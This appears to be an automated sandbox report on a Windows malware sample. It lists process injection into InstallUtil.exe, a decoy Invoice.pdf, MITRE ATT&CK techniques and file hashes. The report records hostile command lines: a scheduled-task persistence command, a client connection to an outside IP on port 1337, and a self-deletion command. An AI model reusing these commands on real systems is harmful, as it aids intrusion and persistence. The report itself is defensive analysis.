4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
3836	MRH.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4292	Quoko tace wesa.exe
4684	InstallUtil.exe
4684	InstallUtil.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
3436	ROR.exe
1924	InstallUtil.exe
1924	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

InstallUtil.exeexplorer.exeInstallUtil.exe

description	pid	process
Token: SeDebugPrivilege	4684	InstallUtil.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeDebugPrivilege	1924	InstallUtil.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe
Token: SeShutdownPrivilege	4396	explorer.exe
Token: SeCreatePagefilePrivilege	4396	explorer.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

AcroRd32.exeexplorer.exe

pid	process
4980	AcroRd32.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe

Suspicious use of SendNotifyMessage 21 IoCs

Processes:

explorer.exe

pid	process
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe
4396	explorer.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

InstallUtil.exeAcroRd32.exeInstallUtil.exeSearchUI.exe

pid	process
1816	InstallUtil.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4684	InstallUtil.exe
4936	SearchUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exeInstallUtil.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 2696 wrote to memory of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 1816 wrote to memory of 4980	1816	InstallUtil.exe	AcroRd32.exe
PID 1816 wrote to memory of 4980	1816	InstallUtil.exe	AcroRd32.exe
PID 1816 wrote to memory of 4980	1816	InstallUtil.exe	AcroRd32.exe
PID 4980 wrote to memory of 4460	4980	AcroRd32.exe	RdrCEF.exe
PID 4980 wrote to memory of 4460	4980	AcroRd32.exe	RdrCEF.exe
PID 4980 wrote to memory of 4460	4980	AcroRd32.exe	RdrCEF.exe
PID 4980 wrote to memory of 3932	4980	AcroRd32.exe	RdrCEF.exe
PID 4980 wrote to memory of 3932	4980	AcroRd32.exe	RdrCEF.exe
PID 4980 wrote to memory of 3932	4980	AcroRd32.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2280	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe
PID 4460 wrote to memory of 2076	4460	RdrCEF.exe	RdrCEF.exe

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2520

C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
"C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1816

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4980

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:4460

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F190443452AD353EF790E8A574734A4 --mojo-platform-channel-handle=1616 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:2280

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6AB0B69C349754120A6133D8149ECD37 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6AB0B69C349754120A6133D8149ECD37 --renderer-client-id=2 --mojo-platform-channel-handle=1628 --allow-no-sandbox-job /prefetch:1
5⤵
PID:2076

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2D2B81FC7BA54264146ADED0C1CE3669 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2D2B81FC7BA54264146ADED0C1CE3669 --renderer-client-id=4 --mojo-platform-channel-handle=1972 --allow-no-sandbox-job /prefetch:1
5⤵
PID:2372

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0962D6C105986E76E8C23D418795F437 --mojo-platform-channel-handle=2476 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:1516

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=06AB5E3251FA1DEBFE059145F54617D9 --mojo-platform-channel-handle=2792 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4160

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=03D054C346CE480C25032F2F108DA67B --mojo-platform-channel-handle=2076 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:1500

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\MRH.exe
"C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3836

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
4⤵
- Creates scheduled task(s)
PID:1864

C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
"C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4684

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
6⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4396

C:\Windows\system32\ctfmon.exe
ctfmon.exe
7⤵
PID:3840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
6⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
4⤵
PID:4776

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:1328

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4016

C:\Users\Admin\AppData\Local\Temp\ROR.exe
"C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3436

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
5d64148d546c58f4dda5fcc29f1e8381

SHA1
c64f81d90f8c0e62a0812091f2d5d2d3d07f76c4

SHA256
80f210dd4bf36892eb9f32a47bbfc72accc6bdcad9dfc7e4c45b98399a577300

SHA512
a41449de9232b1c26a48e5b6ab4e5051d3271bd6ada684bc620725324f4d2db920dd722ef8b6a867999d2ea62859675454a96aa0fecf2a07dc12f18f03a7cc2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UF5SCB4I\library[1].bin
Filesize
259KB

MD5
94aafe6b249b7f529f9d66a6f7d0b80e

SHA1
a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44

SHA256
41c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54

SHA512
e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Invoice.pdf
Filesize
163KB

MD5
5441d36f8dcfdd31e75562b380bea7a8

SHA1
70053ce7491743efacaa4b40f452efb3f32df4e8

SHA256
58098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3

SHA512
06a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MRH.exe
Filesize
1.9MB

MD5
18585735c8866b21e2723a6f020bafd0

SHA1
afb5b2c9d5ca57501835b0c56fd97b0641f01d88

SHA256
e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

SHA512
88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\MRH.exe
Filesize
1.9MB

MD5
18585735c8866b21e2723a6f020bafd0

SHA1
afb5b2c9d5ca57501835b0c56fd97b0641f01d88

SHA256
e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

SHA512
88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ROR.exe
Filesize
1.7MB

MD5
85ea4565608d2f6c35decb6ed8547749

SHA1
e15ae6c93c9e998b030609fdf4b3274925694229

SHA256
f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

SHA512
762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ROR.exe
Filesize
1.7MB

MD5
85ea4565608d2f6c35decb6ed8547749

SHA1
e15ae6c93c9e998b030609fdf4b3274925694229

SHA256
f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

SHA512
762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

Download Submit
C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
Filesize
791.9MB

MD5
